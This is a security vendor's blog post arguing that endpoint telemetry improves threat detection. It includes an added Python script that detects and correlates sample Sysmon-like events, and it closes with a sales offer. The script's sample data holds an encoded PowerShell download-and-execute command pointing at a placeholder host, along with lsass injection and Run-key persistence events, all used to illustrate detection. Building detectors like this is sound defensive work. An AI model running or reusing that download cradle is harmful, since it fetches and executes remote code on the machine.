Network security data has long been the lifeblood of threat detection, but to achieve optimum visibility, supporting data from endpoints is just as important.
Here, Redscan’s Head of Threat Intelligence, George Glass, outlines why endpoint telemetry is now fundamental to reducing the time taken to identify and remediate security incidents.
1. It helps to minimise visibility blind spots
The aggregation and analysis of network-based data remains vital to threat detection. However, without endpoint telemetry to provide broader visibility across the IT estate, there is a significant risk that some types of malicious behaviour can go unseen.
Digital transformation, including widespread cloud adoption and mass remote working, is exacerbating the risk of blind spots by dissolving the network perimeter and creating a larger surface to monitor.
Without endpoint telemetry to help paint a more complete picture, security teams may lack awareness of when and how key assets are compromised. There is a real danger that breaches won’t be discovered until after an attacker has gained a foothold.
Since the start of the COVID-19 pandemic, the Redscan team has witnessed a huge increase in attacks against endpoint devices. Phishing campaigns, abuse of VPN and RDP services, and websites initiating drive-by downloads are all pressing risks which call for more extensive visibility of users and their devices.
2. It helps detect adversary behaviours sooner
Adversaries are constantly evolving their range of approaches to evade detection. Endpoint telemetry helps security teams to enhance threat detection coverage – the range of adversarial techniques that are observable – and identify malicious activity earlier in the cyber kill chain.
PowerShell abuse and process injection (techniques commonly used in fileless malware attacks) are just two in a growing list of TTPs which can only be identified reliably through endpoint telemetry: a network sensor may see the resulting traffic, but not the parent process, the command line or the memory operation that reveals the technique. Fileless malware is a serious risk to organisations and was ranked the top critical threat to endpoints in 2020.
Minimising attacker dwell time is imperative given the serious damage that attackers can inflict in a very short period. Critical vulnerabilities such as Zerologon (CVE-2020-1472), which lets an attacker with network access to a domain controller take over the domain, mean that ransomware operators can go from initial access to full domain-wide encryption in a matter of hours.
3. It provides greater context
In isolation, network-based detections often lack the detail needed to make fast, confident decisions. This is why security teams can struggle to determine conclusively whether an organisation is genuinely under attack, and why alert fatigue remains such a big problem: analysts are forced to review hundreds of disparate alerts because they lack the situational awareness to know which of them belong to the same incident.
Armed with supplementary data from endpoints, security teams can more reliably determine whether activity is malicious or benign, conduct forensic investigations to understand the full scope and kill chain of attacks and respond more quickly and effectively.
4. It can help detect unknown threats
Given the speed of attacker innovation, threat detection shouldn't just be concerned with the detection of known threats. Identifying unknown attackers using new tactics, techniques and procedures (TTPs) is also important for minimising risk.
The proactive, hypothesis-driven search for threats that have evaded existing detections is referred to as threat hunting, a process which requires a wide range of current and historical data to yield results.
Telemetry from endpoints is crucial to threat hunting, providing the information that hunters need to study and hypothesise about current threat behaviours as well as informing the creation of detection rules and watch lists to identify new ones.
How to obtain the right endpoint telemetry
To achieve the level of endpoint visibility required to detect and respond to the latest threats, organisations increasingly need to look beyond traditional endpoint security solutions in favour of Next Generation Anti-virus (NGAV) and Endpoint Detection and Response (EDR) tools.
By collecting raw telemetry relating to processes, file modifications, registry changes and network connections, and using behavioural analytics to examine events in near real-time, NGAV and EDR technologies provide deep visibility across devices. But the benefits don't stop there. Many of the latest solutions also help to accelerate incident response by giving security teams the power to ban hashes, terminate processes and isolate infected endpoints.
However, realising the value of endpoint telemetry isn’t simply about installing the right tool and capturing every piece of information available. To obtain the best outcomes, it’s important to have a clear understanding of the right data to analyse, an ability to enrich it, and also a capacity to respond swiftly and effectively when malicious activity is detected.
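The following script is an added example, not Redscan's code and not the logic of any EDR or NGAV product. It ties together points 2 and 3 above and the telemetry types listed in the previous paragraph: it reads a handful of constructed, Sysmon-like endpoint events (process creation, network connection, remote-thread creation, registry write), applies rules that a network sensor could not evaluate (Office spawning a script host, a base64-encoded PowerShell command line, a remote thread into lsass.exe, a Run-key write), enriches the encoded-command alert with its decoded cleartext, and then groups the resulting alerts by process lineage so that one intrusion is presented as one incident with context rather than five unrelated alerts. The Sysmon event IDs are real, but the field names are simplified, and the hostnames, PIDs, paths, the 203.0.113.0/24 destination and the "internal" address ranges are all assumptions of the example.

```python
import base64
import ipaddress
import json
from collections import defaultdict

# Constructed sample data, not real telemetry: hosts, PIDs, paths and the
# 203.0.113.0/24 destination (a documentation range) are invented for this example.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
# Cleartext of the encoded command in one sample event. powershell.exe -EncodedCommand
# takes base64 of the UTF-16LE script text, so the sample is encoded the same way.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

# One JSON object per line, shaped loosely like Sysmon events (id 1 = process create,
# 3 = network connection, 8 = CreateRemoteThread, 13 = registry value set).
# The simplified field names are an assumption of this example.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"id": 1, "host": "WS01", "pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"id": 1, "host": "WS01", "pid": 500, "ppid": 400, "image": WORD, "cmd": '"WINWORD.EXE" /n invoice.docm'},
    {"id": 1, "host": "WS01", "pid": 600, "ppid": 500, "image": PS, "cmd": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"id": 3, "host": "WS01", "pid": 600, "image": PS, "dst": "203.0.113.7", "dport": 443},
    {"id": 8, "host": "WS01", "pid": 600, "image": PS, "target_pid": 700, "target_image": r"C:\Windows\System32\lsass.exe"},
    {"id": 13, "host": "WS01", "pid": 600, "image": PS, "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater", "value": r"C:\Users\alice\AppData\Roaming\u.exe"},
    # Benign: a service-launched inventory script talking to an internal host.
    {"id": 1, "host": "WS02", "pid": 300, "ppid": 2, "image": r"C:\Windows\System32\services.exe", "cmd": "services.exe"},
    {"id": 1, "host": "WS02", "pid": 310, "ppid": 300, "image": PS, "cmd": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"id": 3, "host": "WS02", "pid": 310, "image": PS, "dst": "10.0.0.5", "dport": 5985},
]]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SESSION_ROOTS = {"explorer.exe", "services.exe", "wininit.exe", "svchost.exe"}  # stop lineage walks here
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]  # assumed


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd):
    """Return the cleartext of a -e/-ec/-enc/-EncodedCommand argument, or None.
    PowerShell accepts any unambiguous prefix of the switch name, so match prefixes."""
    toks = cmd.split()
    for i, tok in enumerate(toks[:-1]):
        name = tok.lstrip("-/").lower()
        if tok[:1] in "-/" and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16le")
            except ValueError:  # malformed base64 or an odd byte count
                return None
    return None


def detect(event, procs):
    """Yield (rule, detail) pairs for one event. procs maps (host, pid) -> process-create
    event and supplies the parent context that a network sensor never sees."""
    img = basename(event.get("image", ""))
    if event["id"] == 1:
        parent = procs.get((event["host"], event["ppid"]))
        if parent and basename(parent["image"]) in OFFICE and img in SCRIPT_HOSTS:
            yield "office_spawns_script_host", f"{basename(parent['image'])} -> {img}"
        if img in {"powershell.exe", "pwsh.exe"}:
            clear = decode_encoded_command(event["cmd"])
            if clear is not None:
                yield "encoded_powershell", clear  # decoded text enriches the alert
    elif event["id"] == 3:
        dst = ipaddress.ip_address(event["dst"])
        if img in SCRIPT_HOSTS and not any(dst in net for net in INTERNAL):
            yield "script_host_external_connection", f"{event['dst']}:{event['dport']}"
    elif event["id"] == 8 and basename(event["target_image"]) == "lsass.exe":
        yield "remote_thread_into_lsass", f"{img} -> lsass.exe"
    elif event["id"] == 13 and "\\currentversion\\run\\" in event["key"].lower():
        yield "run_key_persistence", event["key"]


def lineage_root(procs, host, pid):
    """Climb the parent chain until the parent is unknown or a session root,
    returning the pid at the top of the suspicious process tree."""
    for _ in range(64):  # bound the walk in case the recorded tree is cyclic
        proc = procs.get((host, pid))
        if proc is None:
            return pid
        parent = procs.get((host, proc["ppid"]))
        if parent is None or basename(parent["image"]) in SESSION_ROOTS:
            return pid
        pid = proc["ppid"]
    return pid


def correlate(lines):
    """Parse JSON-lines telemetry, run the rules, and group alerts into incidents keyed by
    (host, lineage root) so one intrusion surfaces as one incident, not a pile of alerts."""
    procs, alerts = {}, []
    for line in lines:
        ev = json.loads(line)
        if ev["id"] == 1:
            procs[(ev["host"], ev["pid"])] = ev
        for rule, detail in detect(ev, procs):
            alerts.append({"host": ev["host"], "pid": ev["pid"], "rule": rule, "detail": detail})
    incidents = defaultdict(list)
    for a in alerts:
        incidents[(a["host"], lineage_root(procs, a["host"], a["pid"]))].append(a)
    return {key: {"root": basename(procs[key]["image"]) if key in procs else "?", "alerts": grp}
            for key, grp in incidents.items()}
```

Running `correlate(SAMPLE_EVENTS)` yields a single incident on WS01 rooted at WINWORD.EXE carrying all five alerts, including the decoded download cradle, while the WS02 inventory script raises nothing: the parent process, the decoded command line and the lineage are exactly the endpoint-only context that lets an analyst treat the WS01 events as one confirmed intrusion instead of five unrelated tickets. The rules are deliberately narrow; a production deployment would tune the internal ranges, the session-root list and the Office and script-host sets to its own estate.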
Save 35% when you subscribe to our Managed NGAV service
Between now and the end of 2020, Redscan is offering 35% off the list price* for managed Next-Gen AV (including technology licences).
Contact your Sales Manager or Technical Account Manager for a quotation, or fill in the form below for a prompt call back.
Terms and conditions
- 35% discount is off the total list price of a 12 month package to Redscan’s ThreatDetect service for endpoints (including software licences).
- Minimum order quantity is 50 licences.
- Software installation by Redscan is not included as part of the offer and subject to a supplementary fee.
- Redscan reserves the right to withdraw or change the terms of this offer at any time.
- Offer applies to all orders received by 31st December 2020.